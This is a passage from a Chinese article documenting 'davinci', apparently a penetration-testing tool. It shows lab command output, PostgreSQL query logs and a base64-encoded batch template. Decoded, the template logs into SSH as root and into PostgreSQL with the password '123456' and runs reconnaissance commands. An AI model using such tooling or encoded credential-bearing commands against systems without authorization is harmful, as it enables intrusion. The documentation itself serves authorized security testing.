  31. TX packets 228336 bytes 36514508 (36.5 MB)

  32. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

  33. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

  34. inet 127.0.0.1 netmask 255.0.0.0

  35. inet6 ::1 prefixlen 128 scopeid 0x10<host>

  36. loop txqueuelen 1000 (Local Loopback)

  37. RX packets 9906 bytes 745185 (745.1 KB)

  38. RX errors 0 dropped 0 overruns 0 frame 0

  39. TX packets 9906 bytes 745185 (745.1 KB)

  40. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

  41. 2024/09/07 15:18:13 [info] try batch execute in : 192.168.83.129

  42. 2024/09/07 15:18:13 [info] execute sql: select version()

  43. +--------------------------------+

  44. | VERSION |

  45. +--------------------------------+

  46. | PostgreSQL 16.4 (Debian |

  47. | 16.4-1.pgdg120+1) on |

  48. | x86_64-pc-linux-gnu, compiled |

  49. | by gcc (Debian 12.2.0-14) |

  50. | 12.2.0, 64-bit |

  51. +--------------------------------+

  52. 2024/09/07 15:18:13 [info] execute sql: select oid, datname from pg_catalog.pg_database

  53. +-----+-----------+

  54. | OID | DATNAME |

  55. +-----+-----------+

  56. | 5 | postgres |

  57. | 1 | template1 |

  58. | 4 | template0 |

  59. +-----+-----------+

如果不使用-f参数指定模板文件,则会默认使用当前目录的.davinci_batch.json文件作为模板。

除了使用模板文件,你也可以直接通过 -b/--b64config 来直接指定模板内容,只需要将模板base64编码即可:

  1. ./davinci batch exec -b WwogICAgewogICAgICAgICJjbWRfdHlwZSI6ICJzc2giLAogICAgICAgICJob3N0cyI6IFsKICAgICAgICAgICAgIjE5Mi4xNjguODMuMTI5IgogICAgICAgIF0sCiAgICAgICAgInBvcnQiOiAyMiwKICAgICAgICAidXNlciI6ICJyb290IiwKICAgICAgICAicGFzc3dkIjogIjEyMzQ1NiIsCiAgICAgICAgImNtZHMiOiBbCiAgICAgICAgICAgICJscyAtYWwgLyIsCiAgICAgICAgICAgICJpZmNvbmZpZyIKICAgICAgICBdCiAgICB9LAogICAgewogICAgICAgICJjbWRfdHlwZSI6ICJwZ3NxbCIsCiAgICAgICAgImhvc3RzIjogWwogICAgICAgICAgICAiMTkyLjE2OC44My4xMjkiCiAgICAgICAgXSwKICAgICAgICAicG9ydCI6IDU0MzIsCiAgICAgICAgInVzZXIiOiAicG9zdGdyZXMiLAogICAgICAgICJwYXNzd2QiOiAiMTIzNDU2IiwKICAgICAgICAiY21kcyI6IFsKICAgICAgICAgICAgInNlbGVjdCB2ZXJzaW9uKCkiLAogICAgICAgICAgICAic2VsZWN0IG9pZCwgZGF0bmFtZSBmcm9tIHBnX2NhdGFsb2cucGdfZGF0YWJhc2UiCiAgICAgICAgXQogICAgfQpd

本工具仅用于研究目的与合法测试,未经授权使用本工具攻击目标是非法的,请勿用于生产环境。

使用者自身要了解不同利用方式引入的风险,例如redis 主从复制会清空数据,利用工具造成的后果及损失需要自行负责。

更多使用方式请参考:https://github.com/Ape1ron/davinci/wiki


文章来源: https://mp.weixin.qq.com/s?__biz=Mzg2MDY2ODc5MA==&mid=2247484010&idx=1&sn=6face0aa268ccb988c6072b3a6d5a0ee&chksm=ce239473f9541d6575b912185cebe20f21c6e449edf320623affa0f53f2a317949fc6ac7f19b&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh